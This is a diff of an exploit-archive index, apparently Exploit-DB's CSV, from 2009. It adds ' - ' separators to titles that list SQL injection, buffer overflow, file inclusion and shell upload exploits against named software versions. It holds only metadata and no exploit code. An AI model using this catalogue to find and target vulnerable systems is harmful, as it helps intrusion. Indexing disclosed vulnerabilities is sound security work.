9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote BoF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660 9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - (.PLS) Local Crash Exploit",2009-09-15,prodigy,windows,dos,0 -9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0 +9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - (cat) Remote Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0 9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Remote Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0 9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0 -9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 (Auth Bypass) Remote SQL Injection",2009-09-16,snakespc,php,webapps,0 +9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Auth Bypass) Remote SQL Injection",2009-09-16,snakespc,php,webapps,0 9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss (id) Blind SQL Injection Exploit",2009-09-16,"Chip d3 bi0s",php,webapps,0 -9699,platforms/php/webapps/9699.txt,"microcms 3.5 (SQL/LFI) Multiple Vulnerabilities",2009-09-16,"learn3r hacker",php,webapps,0 +9699,platforms/php/webapps/9699.txt,"microcms 3.5 - (SQL/LFI) Multiple Vulnerabilities",2009-09-16,"learn3r hacker",php,webapps,0 9700,platforms/php/webapps/9700.rb,"Saphplesson 4.3 - Remote Blind SQL Injection Exploit",2009-09-16,"Jafer Al Zidjali",php,webapps,0 9701,platforms/windows/dos/9701.c,"Notepad++ 5.4.5 - Local .C/CPP Stack Buffer Overflow PoC (0Day)",2009-09-16,"fl0 fl0w",windows,dos,0 -9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 (platform) SQL Injection",2009-09-16,snakespc,php,webapps,0 -9703,platforms/php/webapps/9703.txt,"phpPollScript <= 1.3 (include_class) Remote File Inclusion",2009-09-16,"cr4wl3r ",php,webapps,0 +9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - (platform) SQL Injection",2009-09-16,snakespc,php,webapps,0 +9703,platforms/php/webapps/9703.txt,"phpPollScript <= 1.3 - (include_class) Remote File Inclusion",2009-09-16,"cr4wl3r ",php,webapps,0 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX BoF Exploit",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 -9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit",2009-09-17,bmgsec,windows,remote,0 +9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow Exploit",2009-09-17,bmgsec,windows,remote,0 9706,platforms/php/webapps/9706.txt,"joomla component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 - (.wav) Local Crash PoC",2009-09-17,zAx,windows,dos,0 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) RFI",2009-09-17,"EA Ngel",php,webapps,0 9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 - Local Privilege Escalation",2009-09-17,Rick,linux,local,0 9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x (itemid) Remote SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injection Vulnerabilities",2009-09-17,"learn3r hacker",php,webapps,0 -9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 (Auth Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 -9713,platforms/php/webapps/9713.pl,"Joomla Component com_jreservation 1.5 (pid) Blind SQL Injection Exploit",2009-09-17,"Chip d3 bi0s",php,webapps,0 +9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Auth Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 +9713,platforms/php/webapps/9713.pl,"Joomla Component com_jreservation 1.5 - (pid) Blind SQL Injection Exploit",2009-09-17,"Chip d3 bi0s",php,webapps,0 9714,platforms/multiple/webapps/9714.txt,"Mambo com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0 9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - Remote SQL Injection",2009-09-18,snakespc,multiple,webapps,0 9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - header.php Remote File Include",2009-09-18,"EA Ngel",multiple,webapps,0 @@ -9466,10 +9466,10 @@ id,file,description,date,author,platform,type,port 10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0 10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80 -10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21 +10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 -10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2009-11-16,"Jeremy Brown",windows,dos,80 -10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla Seamonkey 2.0 (jar50.dll) Null Pointer Derefernce",2009-11-16,"Marcin Ressel",windows,dos,0 +10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 - (Win32) CSS Remote Denial of Service Exploit",2009-11-16,"Jeremy Brown",windows,dos,80 +10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla Seamonkey 2.0 - (jar50.dll) Null Pointer Derefernce",2009-11-16,"Marcin Ressel",windows,dos,0 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command DoS",2009-11-13,zhangmc,windows,dos,21 10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 Antivirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 @@ -9480,7 +9480,7 @@ id,file,description,date,author,platform,type,port 10163,platforms/windows/dos/10163.pl,"Novell eDirectory HTTPSTK Login Stack Overflow",2009-11-17,karak0rsan,windows,dos,80 10164,platforms/windows/dos/10164.c,"Kaspersky AV 2010 9.0.0.463 - Local DoS",2009-09-29,Heurs,windows,dos,0 10165,platforms/php/webapps/10165.txt,"TelebidAuctionScript(aid) Blind SQL Injection",2009-11-17,"Hussin X",php,webapps,0 -10166,platforms/asp/webapps/10166.txt,"ActiveTrade 2.0 (default.asp) Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 +10166,platforms/asp/webapps/10166.txt,"ActiveTrade 2.0 - (default.asp) Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 10167,platforms/asp/webapps/10167.txt,"ActiveBids (default.asp) Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 HTML / XSS Injection",2009-11-18,SkuLL-HackeR,php,webapps,0 10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0 @@ -9530,7 +9530,7 @@ id,file,description,date,author,platform,type,port 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0 10230,platforms/php/webapps/10230.txt,"Fake Hit Generator <= 2.2 Shell Upload",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",php,webapps,0 -10232,platforms/php/webapps/10232.txt,"Joomla Component com_gcalendar 1.1.2 (gcid) Remote SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 +10232,platforms/php/webapps/10232.txt,"Joomla Component com_gcalendar 1.1.2 - (gcid) Remote SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 10233,platforms/php/webapps/10233.txt,"phpBazar-2.1.1fix Remote Administration-Panel",2009-11-25,"kurdish hackers team",php,webapps,0 10234,platforms/php/webapps/10234.txt,"Cacti 0.8.7e - Multiple Vulnerabilities",2009-11-26,"Moritz Naumann",php,webapps,0 10235,platforms/windows/remote/10235.py,"Eureka Mail Client Remote Buffer Overflow Exploit",2009-11-26,"Dr_IDE and dookie",windows,remote,0 @@ -9555,7 +9555,7 @@ id,file,description,date,author,platform,type,port 10256,platforms/php/webapps/10256.txt,"WP-Polls 2.x Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0 10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21 10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 - File Deletion",2009-12-01,sharpe,windows,remote,21 -10259,platforms/php/webapps/10259.txt,"Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion",2009-12-01,"cr4wl3r ",php,webapps,0 +10259,platforms/php/webapps/10259.txt,"Ciamos CMS <= 0.9.5 - (module_path) Remote File Inclusion",2009-12-01,"cr4wl3r ",php,webapps,0 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MYSQL Scripts Admin Bypass",2009-12-01,DUNDEE,php,webapps,0 10261,platforms/linux/webapps/10261.txt,"DotDefender 3.8-5 - Remote Command Execution",2009-12-01,"John Dos",linux,webapps,80 10262,platforms/linux/webapps/10262.txt,"ISPworker <= 1.23 - Remote File Disclosure Exploit",2009-12-01,"cr4wl3r ",linux,webapps,80 @@ -9602,7 +9602,7 @@ id,file,description,date,author,platform,type,port 10314,platforms/php/webapps/10314.txt,"BM Classifieds Ads SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10318,platforms/php/webapps/10318.txt,"Joomla yt_color YOOOtheme XSS and Cookie Stealing",2009-12-04,andresg888,php,webapps,80 10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow Exploit",2009-12-05,Dr_IDE,windows,local,0 -10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 +10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - (m3u Playlist file) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - (gro File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow Exploit (Universal)",2009-12-05,Dz_attacker,windows,local,0 @@ -9610,7 +9610,7 @@ id,file,description,date,author,platform,type,port 10325,platforms/php/webapps/10325.txt,"WordPress Image Manager Plugins - Shell Upload",2009-12-05,DigitALL,php,webapps,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0 10327,platforms/multiple/dos/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service",2009-04-01,"Red Hat",multiple,dos,0 -10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 (language_path) Remote File Include Exploit",2009-12-06,"cr4wl3r ",php,webapps,0 +10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 - (language_path) Remote File Include Exploit",2009-12-06,"cr4wl3r ",php,webapps,0 10330,platforms/php/webapps/10330.txt,"elkagroup SQL Injection",2009-12-06,SadHaCkEr,php,webapps,0 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server Directory Transversal",2009-12-06,mr_me,windows,webapps,0 10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 @@ -9637,8 +9637,8 @@ id,file,description,date,author,platform,type,port 10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - (id) Remote SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - (id) Remote SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - (.pls) Universal Local BoF Exploit",2009-12-09,mr_me,windows,local,0 -10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 (Auth Bypass) Remote SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0 -10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 (user.ini) Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0 +10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - (Auth Bypass) Remote SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0 +10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - (user.ini) Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0 10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 pls Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0 10364,platforms/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple XSS and Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps,0 10365,platforms/windows/remote/10365.rb,"Eureka Email 2.2q ERR Remote Buffer Overflow Exploit (Metasploit)",2009-12-09,dookie,windows,remote,0 @@ -9664,7 +9664,7 @@ id,file,description,date,author,platform,type,port 10389,platforms/php/webapps/10389.txt,"Illogator Shop SQL Injection Bypass",2009-12-11,bi0,php,webapps,0 10390,platforms/php/webapps/10390.txt,"phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities",2009-12-11,"Salvatore Fresta",php,webapps,0 10391,platforms/php/webapps/10391.txt,"XAMPP 1.7.2 Change Administrative Password",2009-12-11,bi0,php,webapps,0 -10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 (PLS File) Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0 +10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - (PLS File) Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0 10393,platforms/php/webapps/10393.txt,"B2C Booking Centre Systems SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 10394,platforms/windows/remote/10394.py,"HP NNM 7.53 ovalarm.exe CGI Pre Authentication Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 14948,platforms/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 @@ -9795,7 +9795,7 @@ id,file,description,date,author,platform,type,port 10550,platforms/php/webapps/10550.txt,"Joomla Component City Portal Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 10552,platforms/php/webapps/10552.txt,"FestOs <= 2.2.1 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers - Remote DoS Exploit",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0 -10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 -",2009-12-19,Global-Evolution,php,webapps,0 +10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007",2009-12-19,Global-Evolution,php,webapps,0 10556,platforms/windows/local/10556.c,"PlayMeNow 7.3 / 7.4 - Malformed M3U Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0 10557,platforms/php/local/10557.php,"PHP 5.2.12/5.3.1 - symlink() open_basedir Bypass",2009-12-19,"Maksymilian Arciemowicz",php,local,0 10558,platforms/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure",2009-12-19,"ViRuSMaN ",asp,webapps,0 @@ -9805,13 +9805,13 @@ id,file,description,date,author,platform,type,port 10563,platforms/windows/local/10563.py,"PlayMeNow - Malformed M3U Playlist BOF (Windows XP Universal)",2009-12-19,loneferret,windows,local,0 10564,platforms/php/webapps/10564.txt,"SaurusCMS <= 4.6.4 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 -10567,platforms/php/webapps/10567.txt,"Advance Biz Limited <= 1.0 (Auth Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0 +10567,platforms/php/webapps/10567.txt,"Advance Biz Limited <= 1.0 - (Auth Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0 10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Remote File Upload",2009-12-20,"Master Mind",php,webapps,0 10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion Vulnerabilities",2009-12-20,cOndemned,php,webapps,0 10570,platforms/php/webapps/10570.txt,"Pandora Fms Monitoring Z0D",2009-12-20,Global-Evolution,php,webapps,0 10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller XSS",2009-12-20,K053,php,webapps,0 10572,platforms/php/webapps/10572.txt,"4Images 1.7.1 - Remote SQL Injection",2009-12-20,"Master Mind",php,webapps,0 -10573,platforms/asp/webapps/10573.txt,"8pixel.net 2009. Database Disclosure",2009-12-20,LionTurk,asp,webapps,0 +10573,platforms/asp/webapps/10573.txt,"8pixel.net 2009. - Database Disclosure",2009-12-20,LionTurk,asp,webapps,0 10574,platforms/php/webapps/10574.txt,"phUploader 2 - Remote File Upload",2009-12-20,wlhaan-hacker,php,webapps,0 10575,platforms/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection Exploit",2009-12-21,Sora,php,webapps,0 10576,platforms/asp/webapps/10576.txt,"Angelo-emlak 1.0 - Database Disclosure",2009-12-21,LionTurk,asp,webapps,0 @@ -9838,17 +9838,17 @@ id,file,description,date,author,platform,type,port 10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 File Disclosure",2009-12-22,Stack,php,webapps,0 10600,platforms/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion",2009-12-22,BAYBORA,php,webapps,0 10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Remote File Upload",2009-12-22,MR.Z,php,webapps,0 -10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3)",2009-12-22,d3b4g,windows,local,0 +10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 - (Windows XP SP3)",2009-12-22,d3b4g,windows,local,0 10603,platforms/windows/dos/10603.c,"TFTP Daemon 1.9 - Denial of Service Exploit",2009-12-22,Socket_0x03,windows,dos,0 10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion",2009-12-22,jgaliana,php,webapps,0 10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection",2009-12-22,Gamoscu,php,webapps,0 10609,platforms/php/webapps/10609.txt,"Aurora CMS Remote SQL Injection Exploit",2009-12-22,Sora,php,webapps,0 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 -10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery Cross-Site Scripting",2009-12-23,indoushka,php,webapps,0 +10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery - Cross-Site Scripting",2009-12-23,indoushka,php,webapps,0 10612,platforms/php/webapps/10612.txt,"Add An Ad Script Remote File Upload",2009-12-23,MR.Z,php,webapps,0 10613,platforms/linux/local/10613.c,"Linux Kernel 2.6.18-20 2009 - Local Root Exploit",2009-12-23,DigitALL,linux,local,0 -10614,platforms/php/webapps/10614.txt,"35mm Slide Gallery Directory Traversal",2009-12-23,Mr.tro0oqy,php,webapps,0 -10615,platforms/php/webapps/10615.txt,"PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection",2009-12-23,"Hussin X",php,webapps,0 +10614,platforms/php/webapps/10614.txt,"35mm Slide Gallery - Directory Traversal",2009-12-23,Mr.tro0oqy,php,webapps,0 +10615,platforms/php/webapps/10615.txt,"PHP-Nuke Module Emporium 2.3.0 - (id_catg) SQL Injection",2009-12-23,"Hussin X",php,webapps,0 10617,platforms/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos,0 10618,platforms/windows/local/10618.py,"Adobe Reader and Acrobat",2009-12-23,"Ahmed Obied",windows,local,0 10619,platforms/windows/local/10619.c,"Easy RM to MP3 27.3.700 - Local BoF xp sp2",2009-12-23,bibi-info,windows,local,0 @@ -9861,7 +9861,7 @@ id,file,description,date,author,platform,type,port 10629,platforms/php/webapps/10629.txt,"Traidnt Gallery add Admin Exploit",2009-12-24,wlhaan-hacker,php,webapps,0 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0 10632,platforms/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection",2009-12-24,molli,php,webapps,0 -10633,platforms/php/webapps/10633.txt,"Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion",2009-12-24,Mr.SeCreT,php,webapps,0 +10633,platforms/php/webapps/10633.txt,"Pragyan CMS 2.6.4 - (Search.php) Remote File Inclusion",2009-12-24,Mr.SeCreT,php,webapps,0 10634,platforms/linux/dos/10634.txt,"Picpuz <= 2.1.1 - Buffer Overflow DoS/PoC",2009-12-24,sandman,linux,dos,0 10637,platforms/asp/webapps/10637.txt,"Web Wiz NewsPad Database Disclosure",2009-12-24,"ViRuSMaN ",asp,webapps,0 10638,platforms/asp/webapps/10638.txt,"Web Wiz Forums 9.64 - Database Disclosure",2009-12-24,"ViRuSMaN ",asp,webapps,0 @@ -9883,7 +9883,7 @@ id,file,description,date,author,platform,type,port 10658,platforms/php/webapps/10658.txt,"caricatier 2.5 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10660,platforms/php/webapps/10660.txt,"barbo91 uploads Upload Shell",2009-12-25,indoushka,php,webapps,0 10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 -10664,platforms/windows/local/10664.py,"ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit",2009-12-25,"Encrypt3d.M!nd ",windows,local,0 +10664,platforms/windows/local/10664.py,"ReGet Deluxe 5.2 - (build 330) Stack Overflow Exploit",2009-12-25,"Encrypt3d.M!nd ",windows,local,0 10665,platforms/php/webapps/10665.txt,"Jevonweb Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 10666,platforms/php/webapps/10666.txt,"Simple PHP Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 10667,platforms/php/webapps/10667.txt,"paFileDB 3.1 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 @@ -9932,7 +9932,7 @@ id,file,description,date,author,platform,type,port 10712,platforms/php/webapps/10712.txt,"Nuked-Klan SP4 - RFI",2009-12-26,indoushka,php,webapps,0 10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter Database Disclosure",2009-12-26,LionTurk,asp,webapps,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager (OmniInet.exe) Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 -10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 (event.php id) SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 +10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 - (event.php id) SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 10717,platforms/php/webapps/10717.txt,"DBHCMS Web Content Management System 1.1.4 - RFI",2009-12-26,Gamoscu,php,webapps,0 10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script (Arabic Version) - Upload Shell",2009-12-26,indoushka,php,webapps,0 10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Upload Shell",2009-12-26,indoushka,php,webapps,0 @@ -9958,7 +9958,7 @@ id,file,description,date,author,platform,type,port 10741,platforms/php/webapps/10741.txt,"cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,php,webapps,0 10742,platforms/php/webapps/10742.txt,"Joomla Component com_dhforum SQL Injection",2009-12-27,"ViRuSMaN ",php,webapps,0 10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0 -10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 (seh) Buffer Overflow Exploit (Metasploit)",2009-12-27,dijital1,windows,local,0 +10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - (seh) Buffer Overflow Exploit (Metasploit)",2009-12-27,dijital1,windows,local,0 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - (.pls) Local Universal Buffer Overflow Exploit",2009-12-27,mr_me,windows,local,0 10747,platforms/windows/local/10747.py,"Mini-Stream - (Windows XP SP2 and SP3) Exploit",2009-12-27,dijital1,windows,local,0 10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (1)",2009-12-27,dijital1,windows,local,0 @@ -9998,7 +9998,7 @@ id,file,description,date,author,platform,type,port 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection",2009-12-29,Pyske,php,webapps,0 10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80 -10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0 +10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 - (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0 10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 10796,platforms/asp/webapps/10796.txt,"ezscheduler Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 @@ -10009,7 +10009,7 @@ id,file,description,date,author,platform,type,port 10803,platforms/php/webapps/10803.txt,"UBB Threads 6.0 - RFI",2009-12-30,indoushka,php,webapps,0 10805,platforms/php/webapps/10805.txt,"diesel job site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps,0 10806,platforms/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - XSS",2009-12-30,MaXe,php,webapps,0 -10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection",2009-12-30,Palyo34,php,webapps,0 +10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 - (detail.php) SQL Injection",2009-12-30,Palyo34,php,webapps,0 10808,platforms/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio LFI",2009-12-30,bonobug,php,webapps,0 10809,platforms/php/webapps/10809.txt,"I-Escorts Directory (country_escorts.php country_id) SQL Injection",2009-12-30,R3d-D3V!L,php,webapps,0 10810,platforms/php/webapps/10810.txt,"FlashChat 3.9.3.1 - PHP info",2009-12-30,indoushka,php,webapps,0 @@ -10027,7 +10027,7 @@ id,file,description,date,author,platform,type,port 10825,platforms/php/dos/10825.sh,"WordPress <= 2.9 - DoS (0Day)",2009-12-31,emgent,php,dos,80 10826,platforms/php/dos/10826.sh,"Drupal <= 6.16 / 5.21 - DoS (0Day)",2009-12-31,emgent,php,dos,80 10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 -10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 (bnnr.php) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - (bnnr.php) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10829,platforms/php/dos/10829.pl,"vBulletin 